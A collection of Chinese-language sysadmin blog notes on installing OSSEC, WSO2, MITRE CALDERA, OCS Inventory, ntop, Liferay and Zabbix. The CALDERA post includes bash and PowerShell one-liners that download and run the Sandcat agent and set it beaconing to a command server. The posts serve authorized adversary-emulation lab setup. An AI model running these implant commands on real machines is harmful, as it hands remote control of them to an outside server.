Centos7 安裝ossec-hids-agent記錄

　　最近利用OSSIM來收集主機跟網路的資訊，在Centos7上安裝Agent時有發生一些狀況，記錄一下安裝的步驟。
　　我是利用yum安裝ossec-hids-agents，目前是安裝到最新版的3.5.0，安裝完後要留意幾個地方。

一、修改/var/ossec/etc/ossec-conf。
　　將<server-ip>xxx.xxx.xxx.xxx</server-ip>中的IP改成你的Ossim主機。
二、修改/var/ossec/bin/ossec-configure
　　將OSSEC_HOME="/var/ossec/"改成OSSEC_HOME="/var/ossec"，因為原本預設值中後面的/會造成路徑錯誤。
三、執行/var/ossec/bin/manage_agent。
　　要將Ossim的key import進去，但是會發生Cannot unlink /queue/rids/sender: No such file or directory的錯誤訊息
　　

　這時候你到/var/ossec/queue/rids這個路徑中，會看到有兩個檔案。

　用指令cp sender_counter sender，建立sender這個檔案，再作一次manage_agent就可以了。

Ubuntu18.04安裝Free MDM管理平台WSO2 記錄

　　最近在ithome上看到有人分享WSO2這套開源的MDM管理平台，試著用ithome上分享的資料安裝，在安裝的過程中發生一些狀況，分享一下。
　　我的安裝平台如下：
　　OS：Ubuntu18.04
　　JDK：OpenJDK-8
　　WSO2 iot版本：3.3.0
　　我是利用Esxi6.7安裝Ubuntu18.04，安裝過程中要留意的就是硬碟空間，要自已手動調整，不然／目錄預設只會有4G的空間。
　　另外要留意的是Ubuntu18.04目前預設已經不提供OpenJDK-8，但是WSO2目前只支援OpenJDK-8（應該說只支援JDK1.7~1.8），因此要加一些repository才能把OpenJDK-8安裝起來，設定如下：
　　

To enable main repository,

sudo add-apt-repository main

To enable universe repository,

sudo add-apt-repository universe

To enable multiverse repository,

sudo add-apt-repository multiverse

To enable restricted repository,

sudo add-apt-repository restricted

最後：

sudo apt-get update

這樣就能安裝OpenJDK-8了

sudo apt install openjdk-8-jdk

安裝完OpenJDK-8之後，要設定JAVA_HOME，不然會無法執行，網路上的教學很多，但是要讓WSO2成功執行的話，在Ubuntu18中是需要設定在/etc/environment這個檔案裡的。
確認OpenJDK-8安裝路徑：

sudo update-alternatives --display java

sudo vi /etc/environment

然後依你安裝OpenJDK-8的實際路徑加入：

JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"

完成後，下這個指令讓JAVA_HOME生效：

source /etc/environment

到這裡環境就準備好了，那可以到這個網址下載3.3.0版，它有兩個版本可以選擇，一個是有Update的一個沒有，可以Update的那個版本需要註冊，因為我只是想要先測試，因此是下載沒Update的版本。

https://wso2.com/iot/install/download/?type=downloader

下載完成後，我是用FTP上傳到主機，但是因為它是Zip檔，所以還要再安裝Unzip

sudo apt install unzip

網路上的教學是將檔案放置於/opt這個目錄下：

sudo unzip wso2iot-3.3.0.zip
sudo mv wso2iot-3.3.0 wso2

完成後要設定程式的連線資訊：

sudo /opt/wso2/script/change-ip.sh

這個部份教學文件是有提醒：
第一個問題要回答：localhost
第二個問題要回答：你的FQDN名字(例如：www.haha.tw)－－－這要透過DNS去指定對應。
之後就都是Enter，在最後還有一個地方會要輸入(ip/hostname)，這裡我也是輸入FQDN。
另外，Ubuntu18.04在安裝的過程似乎不會特別提醒修改時區、語言資訊，所以安裝完後要記得修改時區，不然時間會不對。
指令：

sudo dpkg-reconfigure tzdata

因為我目前工作的地方沒有內部使用的Wifi，再加上最近因為有些事要忙，無法架設環境測試管理的狀況，等之後有機會測試再補上。
不過可以先參考ithome上的文章。
參考資料如下：
https://askubuntu.com/questions/148638/how-do-i-enable-the-universe-repository
https://www.fosstechnix.com/install-oracle-java-8-on-ubuntu/
https://ithelp.ithome.com.tw/articles/10218007

Ubuntu 18.04安裝MITRE ATT＆CK的開源自動化攻擊模擬平台CALDERA

　　目前Ubuntu 18.04安裝完後，就會有Python3，作完Upgrade後，目前最新版為Python3.6.8（2019/07/16)，那還需要安裝pip這個工具。

　　我習慣會先作系統更新，順序如下：
　　
sudo su
apt update
apt upgrade

　　作完更新後開始安裝pip3，但是無法安裝，解決方式如下：

add-apt-repository universe

apt-get update

apt-get install python3-pip

　　那還需要更新setuptools ：

pip3 install --upgrade setuptools

　　作完Python的準備後，我建議先安裝MongoDB，Caldera的建議是3.2以上的版本，目前Ubuntu18.04上的版本為3.6.3（2019/07/16)：

apt install mongodb

　　之後修改/etc/mongodb.conf，加入這行 replSet = caldera，指令如下：

echo "replSet = caldera" >> /etc/mongodb.conf

　　安裝caldera：

mkdir /caldera
cd /caldera
git clone https://github.com/mitre/caldera.git --recursive
cd /caldera
pip3 install -r requirements.txt

　　如果要透過別台電腦連結到Caldera主機，要修改local.yml，將host：127.0.0.1，改成0.0.0.0。

vi /caldera/caldera/conf/local.yml

　　加入Caldera's RAT，記得要在/caldera這層目錄中作這個動作，而不是在/caldera/caldera，要留意：

mkdir -p dep/crater/crater && cd dep/crater/crater
wget https://github.com/mitre/caldera-crater/releases/download/v0.1.0/CraterMainWin7.exe
wget https://github.com/mitre/caldera-crater/releases/download/v0.1.0/CraterMainWin8up.exe
ln -s CraterMainWin8up.exe CraterMain.exe

　　這些都完成後，回到/caldera/caldera中執行這個指令：

python3 server.py
　　
　　如果都正常的話，應該會有這個畫面：

參考資料：
https://caldera.readthedocs.io/en/latest/installation.html
https://github.com/mitre/caldera
https://www.sprocketsecurity.com/blog/getting-started-with-mitre-caldera


　　模擬測試，系統中已有內建幾種測試模式，但是要先加入Group，就是要找受測電腦，受測電腦需要執行Agent，目前Caldera提供的是一個叫Sandcat的Agent，這個Agent提供Linux、MacOS、Windows三種系統，因手上沒有Mac電腦，只試過Linux及Windows，執行指令如下：
　　
　　Linux：如果是要用你安裝Caldera機器測試的話，localhost不用改，後面的my_group則是Caldera系統看到的名稱，如果會用超過一台以上的測試機的話，記得修改，不然你每一台受測機都會叫my_group。
　　

while true; do curl -sk -X POST -H 'file:sandcat-linux' http://localhost:8888/file/download > /tmp/sandcat-linux && chmod +x /tmp/sandcat-linux && /tmp/sandcat-linux http://localhost:8888 my_group; sleep 60; done

有連結上主機的話，就會出現如下圖中[+] Beaconing這個字眼。

Windows：要注意的是請用PowerShell開這行指令，localhost的部份要改成主機的IP，那一樣留意my_group

while($true) {$url="http://localhost:8888/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("file","sandcat.exe");$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);C:\Users\Public\sandcat.exe http://localhost:8888 my_group; sleep 60}

　　這時候應該就能在系統中看到這兩筆資料，才能展開測試：

現在新版的Caldera的安裝跟使用跟舊版的已經不太一樣了，新版的安裝方式簡單很多，可以參考官方的GitHub。

https://github.com/mitre/caldera

Ubuntu18.04無法安裝python3 pip3

　　Ubuntu18.04，無法安裝python3 pip3問題：

　　sudo add-apt-repository universe

　　sudo apt-get update

　　sudo apt-get install python3-pip

安裝在VMWare的Ubuntu 18.04硬碟空間問題

　　記錄一下，在Esxi6.7上安裝Ubuntu18.04時，在硬碟空間設定時，要記得調整ubuntu-lv的空間，如果不調整，它預設只會切割4G給／，所以要記得去Edit。

如果忘了在安裝時調整，可以進系統後再調整。
　　

　　指令是參考這個網站：https://blog.moa.tw/2018/12/ubuntu-1804-root-lvm-volume.html

　　# 1. 用 lvresize

　　$ sudo lvresize -A n -l +100%FREE /dev/ubuntu-vg/ubuntu-lv

　　# 2. resize ext4

　　$ sudo resize2fs /dev/ubuntu-vg/ubuntu-lv

　　# 3. df 看一下

　　$ df

　　Filesystem 1K-blocks Used Available Use% Mounted on

　　/dev/mapper/ubuntu--vg-ubuntu--lv 19540624 4050844 14634724 22% /

　　如果你忘了原本切割給VM的空間，可以先下這個指令去查詢：

　　＄ sudo pvscan

OCS Inventory 2.5 無法盤點

　　裝好的OCS 2.5無法盤點，看了一下Log，會出現這個錯誤。
 [perl:error] [pid 21208] [client 192.168.1.2:59659] Failed to open log file : Permission denied (/var/log/ocsinventory-server)\n
　　這是Centos 的selinux造成的，OCS無法讀寫/var/log/ocsinventory-server/這個資料夾及裡面的檔案，網路上一般的教法是關掉selinux，但是不建議。
　　這邊提供另外的作法：

　　chcon -t httpd_sys_rw_content_t /var/log/ocsinventory-server

　　用ls -lZ查看，成功的話，會變這樣：

　　drwxrwxr-x. apache apache unconfined_u:object_r:httpd_sys_rw_content_t:s0 ocsinventory-server

　　

Raspberry Pi 3 Install ntop

　　
　參考網站：http://packages.ntop.org/RaspberryPI/

1. sudo wget http://packages.ntop.org/RaspberryPI/apt-ntop_1.0.190416-469_all.deb
2. sudo dpkg -i apt-ntop_1.0.190416-469_all.deb
3. sudo apt-get install ntopng nprobe n2n

　請留意，目前(2019/06/29)如果要安裝在Raspbian Buster上會有問題。

　目前ntop原廠的安裝方式都需要在/etc/apt/sources.list.d/這個目錄中建立一個叫ntop.list的檔案，裡面的內容都是：

　deb http://apt.ntop.org/stretch_pi armhf/

　deb http://apt.ntop.org/stretch_pi all/

　當你安裝的是Raspbian Buster版本的時候，只要作Update，就會把ntop.list裡的資料改成這個：

　deb http://apt.ntop.org/buster_pi armhf/

　deb http://apt.ntop.org/buster_pi all/

　因ntop的repository中目前並無buster這個目錄，所以會造成找不到檔案而無法安裝，建議安裝Raspbian Stretch版本，減少安裝ntop的困擾。

　使用心得，用Raspberry跑nTop的經驗，用SD卡的話，跑一陣子後SD卡容易死掉。改用mSATA套件x850後，狀況是有比較好，但是也是有發生問題，所以要用Raspberry收nTop短時間可以，但是長時間不建議。

Centos7安裝Liferay7.1記錄

　　最近想要裝一下Liferay來作為工作上跟同事之間的訊息交流，上網找了一些文章，如果你用liferay+centos7去Google搜尋，應該會出現這一篇文章：
　　https://hostpresto.com/community/tutorials/how-to-install-liferay-on-centos-7/
　　我用這篇文章安裝完成後，連上去都會出現HTTP STATUS 404的錯誤訊息，怎麼弄都解決不了，搞的我都懷疑自已的人生了，最後查出來，在這篇文章中，說到如果要用其它的資料庫，要手動建立portal-ext.properties這個檔案，問題就是這個，文章上面說明的存放路徑會造成HTTP 404，必需要把這個檔案放在Tomcat這個資料夾中，而不是它的文章中說的路徑。
　　另外，這一篇文章中還要留意兩個點：
　　一、portal-ext.properties這個檔案內容，作者是用Mariadb，如果你是裝MySQL就不能照搬。建議參考此篇文章
https://dev.liferay.com/zh/discover/reference/-/knowledge_base/7-1/database-templates。
這是官方的範例，上面有不同資料庫的範本。
　　二、自設systemd服務，文章中的範例要留意，它的格式以及
　　　　ExecStart=/var/liferay/tomcat-8.0.32/bin/startup.sh
　　　　ExecStop=/var/liferay/tomcat-8.0.32/bin/shutdown.sh
　　　　這兩行的路徑要留意，要照自已設立的路徑，以及抓的liferay版本有關。
　　它的排序也有問題：
　　　　有問題：
　　　　[Unit]
　　　　Description=Liferay Tomcat service
　　　　After=syslog.target network.target[Service]
　　　　Type=forking
　　　　ExecStart=/var/liferay/tomcat-8.0.32/bin/startup.sh
　　　　ExecStop=/var/liferay/tomcat-8.0.32/bin/shutdown.sh
　　　　Restart=always
　　　　User=root
　　　　Group=root
　　　　StandardOutput=syslog
　　　　StandardError=syslog
　　　　SyslogIdentifier=liferay
　　　　[Install] WantedBy=multi-user.target

　　　　比較沒問題的：
　　　　[Unit]
　　　　Description=Liferay Tomcat service
　　　　After=syslog.target network.target

　　　　[Service]
　　　　Type=forking
　　　　ExecStart=/var/liferay/tomcat-8.0.32/bin/startup.sh
　　　　ExecStop=/var/liferay/tomcat-8.0.32/bin/shutdown.sh
　　　　Restart=always
　　　　User=root
　　　　Group=root
　　　　StandardOutput=syslog
　　　　StandardError=syslog
　　　　SyslogIdentifier=liferay

　　　　[Install]
　　　　WantedBy=multi-user.target

Zabbix 4.0 LTS(MySql版) Vmware Esxi記錄

　　記錄一下使用Zabbix4.0遇到的狀況。
　　不想要自行安裝Zabbix的，官網上有它們已經包好的虛擬化檔，依自已的需求抓下來後解壓縮，上傳到Esxi，我用的是Esxi 6.7，但是官網上抓來的是Workstation用的，放到Esxi上還要再作轉換，開Esxi的SSH功能，用SSH連到Esxi後CD到上傳的資料夾，用這個指令轉換

　　vmkfstools –i disk.vmdk new.vmdk

　　轉換完後，將disk.vmdk改名，然後將new.vmdk改成disk.vmdk。就能用Esxi正常開啟。
　　Zabbix一開機之後，預設的登入帳密是：

　　帳號：appliance
　　密碼：zabbix

　　Zabbix的4.0 LTS是用Ubuntu 16.04.3作為OS，一開機時，它會自動偵測網路，如果沒DHCP的，那就要等大約4-5分鐘讓它跑。但是它的Ubuntu 16.04.3這個版本有一個問題，如果你是要手動設定IP的，因為它的vi版本有問題，會無法執行"insert"，但是又因為沒有網路來安裝vim，所以會造成你無法手動設定ip。
　　上網爬了一下文，這個問題是/etc/vim/vimrc.tiny裡的設定有問題，要將：
　　set compatible
　　改成
　　set nocompatible
　　就能解決vi的問題。
　　至於怎麼使用Zabbix網路上教學很多，另外要記錄的問題是，圖表時間問題，圖表的時間跟系統時間不一致，差了6小時，這是要修改以下這個檔案。
　　/etc/apache2/conf-availables/zabbix.conf
　　將php_value date.timezone 改成Asia/Taipei，再重啟Apache2就可以了。

安裝Agent，在Windows7以上的作業系統安裝Agent要留意的是，命令提示字元要用系統管理員啟動，不然會無法將Agent安裝並啟動。
 　　Zabbix中的圖表，遇到中文字會變口口，解決方式是參考這篇文章
https://tw.saowen.com/a/4763888931e5b429f037bed084ad3168bc608d4a4d96a85b85178e12f7850a99
　　但是路徑不一樣。我用的4.0 LTS版中，它是去抓/etc/alternatives/zabbix-frontend-font這個link，這個是Link到 /usr/share/fonts/truetype/dejavu/DejaVuSans.ttf這個檔案。
　　

我的作法是去我的Windows7，找到標楷體這個字型的檔案kaiu.ttf，上傳到Zabbix，然後將kaiu.ttf更名成DejaVuSans.ttf，就好了。